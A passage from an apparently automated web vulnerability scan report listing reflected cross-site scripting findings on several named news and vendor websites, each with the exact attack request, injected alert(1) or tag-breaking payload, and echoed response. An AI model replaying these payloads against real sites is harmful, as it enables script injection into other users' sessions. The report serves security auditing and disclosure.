Date: Mon, 12 Sep 2011 12:57:37 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 3.0.2
ETag: "d009d37e9d56f8f839cea714c7a26681"
X-Runtime: 47
Cache-Control: private, max-age=0, must-revalidate
Content-Length: 159
Status: 200
Content-Type: text/javascript; charset=utf-8

JSONPCallback_097df2<script>alert(1)</script>c347156b75c({"blacklists":[],"xpaths":["//div[@class='content-text']"],"message":"new page re-instrumenting: ok"})

2.51. http://pglb.buzzfed.com/148250/91bc34b96eac101805574950b6644cc6 [callback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://pglb.buzzfed.com
Path:   /148250/91bc34b96eac101805574950b6644cc6

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload cf6f5<script>alert(1)</script>7bb596485ce was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /148250/91bc34b96eac101805574950b6644cc6?callback=BF_PARTNER.gate_responsecf6f5<script>alert(1)</script>7bb596485ce&cb=1793 HTTP/1.1
Host: pglb.buzzfed.com
Proxy-Connection: keep-alive
Referer: http://www.popsugar.com/community/welcome
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript; charset=ISO-8859-1
Server: lighttpd
Content-Length: 79
Cache-Control: max-age=604763
Expires: Mon, 19 Sep 2011 12:47:23 GMT
Date: Mon, 12 Sep 2011 12:48:00 GMT
Connection: close

BF_PARTNER.gate_responsecf6f5<script>alert(1)</script>7bb596485ce(1304470645);

2.52. http://player.ooyala.com/player.js [autoplay parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://player.ooyala.com
Path:   /player.js

Issue detail

The value of the autoplay request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 5fc32%3balert(1)//3209774be4c was submitted in the autoplay parameter. This input was echoed as 5fc32;alert(1)//3209774be4c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /player.js?autoplay=05fc32%3balert(1)//3209774be4c&width=900&deepLinkEmbedCode=5wNDEwMjptj029cugN8F8Ne2kSHuLQdr&height=506&embedCode=5wNDEwMjptj029cugN8F8Ne2kSHuLQdr HTTP/1.1
Host: player.ooyala.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.popsugar.com/ajaxharness1274b%22-alert(document.location)-%22faa5baba69b?harness_requests=%7B%22replacements%22%3A%20%5B%7B%22sugar-menu-subnav-items%22%3A%20%22%2Fsugar-subnav-items%3Ffastcache%3D1%26fg_locale%3D0%22%7D%2C%20%7B%22user-feedback-div%22%3A%20%22%2Fsugar-user-feedback-form%3Fissue%3Dinfinite%2520scroll%22%7D%5D%2C%20%22callbacks%22%3A%20%5B%5D%7D

Response

HTTP/1.1 200 OK
Last-Modified: Mon, 12 Sep 2011 13:02:06 GMT
Content-Type: text/javascript; charset=utf-8
X-Ooyala-Server-Id: i-9d79a4f1
X-Pad: avoid browser bug
Content-Length: 26501
Cache-Control: private, max-age=300
Date: Mon, 12 Sep 2011 13:02:06 GMT
Connection: close
Vary: Accept-Encoding

(function(){var f="9.0.115";var K="6.0.65";window.OOYALA_PLAYER_JS={};var j=(navigator.appVersion.indexOf("MSIE")!==-1)?true:false;var R=(navigator.appVersion.toLowerCase().indexOf("win")!==-1)?true:f
...[SNIP]...
NJl90x_Sxol5VyMQcXiGLsb0g2h6vnF5i0-T5Ft4xBOt5dq6lB95jeM5d5eZMMassZqCrj2-1YzQoYyyPKpBOsL7oivj3RtKy7";var S=window.location.href;if(S){if(G&&(G[G.length-1]!="&")){G+="&";}G+="docUrl="+escape(S);}var O="05fc32;alert(1)//3209774be4c";if(document.location.host.toLowerCase().indexOf("beboframe.com")>
...[SNIP]...

2.53. http://savannahnow.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://savannahnow.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4324a'-alert(1)-'2befc103ff4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?4324a'-alert(1)-'2befc103ff4=1 HTTP/1.1
Host: savannahnow.com
Proxy-Connection: keep-alive
Referer: http://drupal.org/cases
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 200 OK
Date: Mon, 12 Sep 2011 12:49:26 GMT
Server: Apache
X-Powered-By: PHP/5.2.10
X-Drupal-Cache: MISS
Expires: Mon, 12 Sep 2011 12:54:27 GMT
Last-Modified: Mon, 12 Sep 2011 12:49:26 +0000
Cache-Control: must-revalidate, max-age=0, s-maxage=300
ETag: "1315831766"-gzip
Vary: Accept-Encoding
Content-Length: 149917
Content-Type: text/html; charset=utf-8
X-Cache: MISS from sms8.morris.com
X-Cache-Lookup: MISS from sms8.morris.com:3128
Connection: keep-alive

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<head>
<
...[SNIP]...
// MDW_Group
           s.prop17='Home' // MDW_Cat
           s.prop18='97010 Home' // MDW_Sub_Cat
           s.prop19=''
           s.prop20=''
s.prop21 = '' //NID
s.prop22 = '' //Author
s.prop23 = '?4324a'-alert(1)-'2befc103ff4=1' //Tax
s.prop24 = '' //Content type
s.campaign=s.getQueryParam('cid');

           /********* INSERT THE DOMAIN AND PATH TO YOUR CODE BELOW ************/

           var s_code=s.t();if(s_code)document.
...[SNIP]...

2.54. http://savannahnow.com/sites/all/modules/morris/yca_plugin/yahoo.cssca685 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://savannahnow.com
Path:   /sites/all/modules/morris/yca_plugin/yahoo.cssca685

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6ae60'-alert(1)-'04761a867b7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sites6ae60'-alert(1)-'04761a867b7/all/modules/morris/yca_plugin/yahoo.cssca685 HTTP/1.1
Host: savannahnow.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://cm.npc-morris.overture.com/js_1_0/?config=9472395290&type=home_page&ctxtId=home_page&source=npc_morris_savannahmorningnews_t2_ctxt&adwd=420&adht=150&ctxtUrl=http%3A//savannahnow.com/&css_url=http://savannahnow.com/sites/all/modules/morris/yca_plugin/yahoo.cssca685%22%3E%3Cscript%3Ealert(1)%3C/script%3E7a61d61a441&tg=1&bg=FFFFFF&bc=FFFFFF&refUrl=http%3A//drupal.org/cases&du=1&cb=1315849723547

Response

HTTP/1.0 404 Not Found
Date: Mon, 12 Sep 2011 13:00:48 GMT
Server: Apache
X-Powered-By: PHP/5.2.10
X-Drupal-Cache: MISS
Expires: Mon, 12 Sep 2011 13:05:48 GMT
Last-Modified: Mon, 12 Sep 2011 13:00:48 +0000
Cache-Control: must-revalidate, max-age=0, s-maxage=300
ETag: "1315832448"-gzip
Vary: Accept-Encoding
Content-Length: 79238
Content-Type: text/html; charset=utf-8
X-Cache: MISS from sms8.morris.com
X-Cache-Lookup: MISS from sms8.morris.com:3128
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<head>
<
...[SNIP]...
up
           s.prop17='97040 Other' // MDW_Cat
           s.prop18='97040 Other' // MDW_Sub_Cat
           s.prop19=''
           s.prop20=''
s.prop21 = '' //NID
s.prop22 = '' //Author
s.prop23 = 'Sites6ae60'-alert(1)-'04761a867b7' //Tax
s.prop24 = '' //Content type
s.campaign=s.getQueryParam('cid');

           /********* INSERT THE DOMAIN AND PATH TO YOUR CODE BELOW ************/

           var s_code=s.t();if(s_code)document.wr
...[SNIP]...

2.55. http://video.fastcompany.com/companies/mansueto-digital/videos.rss [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://video.fastcompany.com
Path:   /companies/mansueto-digital/videos.rss

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 28b0a<script>alert(1)</script>3cd7c3816cf was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /companies28b0a<script>alert(1)</script>3cd7c3816cf/mansueto-digital/videos.rss?ids=35a3467f31b51,5a74966232a47,1bc51eb069eb1,29b58b01bf488,79b00a7ba65dd,273bd40607339&append_image_to_description=false&verbosity=low&p=fc_playlist_homepage&template_ids=rtmp_only%2Cflowplayer%2Cflowplayer_bwcheck&assets=dynamic_stream_switching_capable&append_image_to_description=false&still_frame_height=180 HTTP/1.1
Host: video.fastcompany.com
Proxy-Connection: keep-alive
Referer: http://video.fastcompany.com/plugins/player.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1603584230-1315849705375

Response

HTTP/1.1 404 Not Found
Date: Mon, 12 Sep 2011 12:49:11 GMT
Server: VoxCAST
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Status: 404
X-Runtime: 15
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 3.0.4
Content-Length: 610
X-Cache: MISS from VoxCAST

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<body>
<h1>File "/companies28b0a<script>alert(1)</script>3cd7c3816cf/mansueto-digital/videos.rss?ids=35a3467f31b51,5a74966232a47,1bc51eb069eb1,29b58b01bf488,79b00a7ba65dd,273bd40607339&append_image_to_description=false&verbosity=low&p=fc_playlist_homepage&template_ids=
...[SNIP]...

2.56. http://www.ciphertex.com/misc/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ciphertex.com
Path:   /misc/favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 27b58"><a>9130c261090 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /misc27b58"><a>9130c261090/favicon.ico HTTP/1.1
Host: www.ciphertex.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSe7e1ce4917bcb7c6c1e7e1e807484f3c=73a26afbd88192a18065e392787c8e3e; has_js=1; __utma=187742778.1111443639.1315849319.1315849319.1315849319.1; __utmb=187742778.2.10.1315849319; __utmc=187742778; __utmz=187742778.1315849319.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ciphertext%20data%20security

Response

HTTP/1.1 404 Not Found
Date: Mon, 12 Sep 2011 12:45:04 GMT
Server: Apache
X-Powered-By: PHP/5.2.17
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Mon, 12 Sep 2011 12:45:04 GMT
Vary: Accept-Encoding
Content-Length: 9999
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>
...[SNIP]...
<body id="page-misc27b58"><a>9130c261090-favicon.ico" class="section-misc27b58">
...[SNIP]...

2.57. http://www.ciphertex.com/modules/system/defaults.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ciphertex.com
Path:   /modules/system/defaults.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 99907"><a>10a7c8eef9e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /99907"><a>10a7c8eef9e/system/defaults.css?0 HTTP/1.1
Host: www.ciphertex.com
Proxy-Connection: keep-alive
Referer: http://www.ciphertex.com/products/view/cx-ranger-ex
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSe7e1ce4917bcb7c6c1e7e1e807484f3c=73a26afbd88192a18065e392787c8e3e; has_js=1; __utma=187742778.1111443639.1315849319.1315849319.1315849319.1; __utmb=187742778.2.10.1315849319; __utmc=187742778; __utmz=187742778.1315849319.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ciphertext%20data%20security

Response

HTTP/1.1 404 Not Found
Date: Mon, 12 Sep 2011 12:44:34 GMT
Server: Apache
X-Powered-By: PHP/5.2.17
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Mon, 12 Sep 2011 12:44:35 GMT
Vary: Accept-Encoding
Content-Length: 10005
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>
...[SNIP]...
<body id="page-99907"><a>10a7c8eef9e-system-defaults.css" class="section-99907">
...[SNIP]...

2.58. http://www.ciphertex.com/modules/system/maintenance.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ciphertex.com
Path:   /modules/system/maintenance.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 58e7f"><a>be9fe9bf51d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /58e7f"><a>be9fe9bf51d/system/maintenance.css?0 HTTP/1.1
Host: www.ciphertex.com
Proxy-Connection: keep-alive
Referer: http://www.ciphertex.com/products/view/cx-ranger-ex
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSe7e1ce4917bcb7c6c1e7e1e807484f3c=73a26afbd88192a18065e392787c8e3e; has_js=1; __utma=187742778.1111443639.1315849319.1315849319.1315849319.1; __utmb=187742778.2.10.1315849319; __utmc=187742778; __utmz=187742778.1315849319.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ciphertext%20data%20security

Response

HTTP/1.1 404 Not Found
Date: Mon, 12 Sep 2011 12:44:26 GMT
Server: Apache
X-Powered-By: PHP/5.2.17
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Mon, 12 Sep 2011 12:44:26 GMT
Vary: Accept-Encoding
Content-Length: 10011
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>
...[SNIP]...
<body id="page-58e7f"><a>be9fe9bf51d-system-maintenance.css" class="section-58e7f">
...[SNIP]...

2.59. http://www.ciphertex.com/modules/system/system-menus.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ciphertex.com
Path:   /modules/system/system-menus.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9d310"><a>4a350385199 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /9d310"><a>4a350385199/system/system-menus.css?0 HTTP/1.1
Host: www.ciphertex.com
Proxy-Connection: keep-alive
Referer: http://www.ciphertex.com/products/view/cx-ranger-ex
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSe7e1ce4917bcb7c6c1e7e1e807484f3c=73a26afbd88192a18065e392787c8e3e; has_js=1; __utma=187742778.1111443639.1315849319.1315849319.1315849319.1; __utmb=187742778.2.10.1315849319; __utmc=187742778; __utmz=187742778.1315849319.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ciphertext%20data%20security

Response

HTTP/1.1 404 Not Found
Date: Mon, 12 Sep 2011 12:44:32 GMT
Server: Apache
X-Powered-By: PHP/5.2.17
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Mon, 12 Sep 2011 12:44:32 GMT
Vary: Accept-Encoding
Content-Length: 10013
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>
...[SNIP]...
<body id="page-9d310"><a>4a350385199-system-system-menus.css" class="section-9d310">
...[SNIP]...

2.60. http://www.ciphertex.com/modules/system/system-menus.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ciphertex.com
Path:   /modules/system/system-menus.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 78804"><a>580dc18678 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /modules/system78804"><a>580dc18678/system-menus.css?0 HTTP/1.1
Host: www.ciphertex.com
Proxy-Connection: keep-alive
Referer: http://www.ciphertex.com/products/view/cx-ranger-ex
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSe7e1ce4917bcb7c6c1e7e1e807484f3c=73a26afbd88192a18065e392787c8e3e; has_js=1; __utma=187742778.1111443639.1315849319.1315849319.1315849319.1; __utmb=187742778.2.10.1315849319; __utmc=187742778; __utmz=187742778.1315849319.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ciphertext%20data%20security

Response

HTTP/1.1 404 Not Found
Date: Mon, 12 Sep 2011 12:46:03 GMT
Server: Apache
X-Powered-By: PHP/5.2.17
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Mon, 12 Sep 2011 12:46:03 GMT
Vary: Accept-Encoding
Content-Length: 10011
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>
...[SNIP]...
<body id="page-modules-system78804"><a>580dc18678-system-menus.css" class="section-modules sidebar-none">
...[SNIP]...

2.61. http://www.ciphertex.com/modules/system/system.css [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ciphertex.com
Path:   /modules/system/system.css

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c8557"><a>87f9da9af62 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /modules/system/system.cssc8557"><a>87f9da9af62?0 HTTP/1.1
Host: www.ciphertex.com
Proxy-Connection: keep-alive
Referer: http://www.ciphertex.com/products/view/cx-ranger-ex
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSe7e1ce4917bcb7c6c1e7e1e807484f3c=73a26afbd88192a18065e392787c8e3e; has_js=1; __utma=187742778.1111443639.1315849319.1315849319.1315849319.1; __utmb=187742778.2.10.1315849319; __utmc=187742778; __utmz=187742778.1315849319.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ciphertext%20data%20security

Response

HTTP/1.1 404 Not Found
Date: Mon, 12 Sep 2011 12:45:24 GMT
Server: Apache
X-Powered-By: PHP/5.2.17
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Mon, 12 Sep 2011 12:45:24 GMT
Vary: Accept-Encoding
Content-Length: 10001
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>
...[SNIP]...
<body id="page-modules-system-system.cssc8557"><a>87f9da9af62" class="section-modules sidebar-none">
...[SNIP]...

2.62. http://www.ciphertex.com/sites/all/modules/cck/modules/fieldgroup/fieldgroup.css [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ciphertex.com
Path:   /sites/all/modules/cck/modules/fieldgroup/fieldgroup.css

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b77bd"><a>f6aa1bd3806 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /sites/all/modules/cck/modules/b77bd"><a>f6aa1bd3806/fieldgroup.css?5 HTTP/1.1
Host: www.ciphertex.com
Proxy-Connection: keep-alive
Referer: http://www.ciphertex.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSe7e1ce4917bcb7c6c1e7e1e807484f3c=73a26afbd88192a18065e392787c8e3e

Response

HTTP/1.1 404 Not Found
Date: Mon, 12 Sep 2011 12:44:31 GMT
Server: Apache
X-Powered-By: PHP/5.2.17
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Mon, 12 Sep 2011 12:44:32 GMT
Vary: Accept-Encoding
Content-Length: 10039
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>
...[SNIP]...
<body id="page-sites-all-modules-cck-modules-b77bd"><a>f6aa1bd3806-fieldgroup.css" class="section-sites sidebar-none">
...[SNIP]...

2.63. http://www.ciphertex.com/sites/all/modules/cck/modules/fieldgroup/fieldgroup.css [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ciphertex.com
Path:   /sites/all/modules/cck/modules/fieldgroup/fieldgroup.css

Issue detail

The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 77d66"><a>596ac13dd54 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /sites/all/modules/cck/modules/fieldgroup/77d66"><a>596ac13dd54?5 HTTP/1.1
Host: www.ciphertex.com
Proxy-Connection: keep-alive
Referer: http://www.ciphertex.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSe7e1ce4917bcb7c6c1e7e1e807484f3c=73a26afbd88192a18065e392787c8e3e

Response

HTTP/1.1 404 Not Found
Date: Mon, 12 Sep 2011 12:45:40 GMT
Server: Apache
X-Powered-By: PHP/5.2.17
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Mon, 12 Sep 2011 12:45:40 GMT
Vary: Accept-Encoding
Content-Length: 10031
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<head>
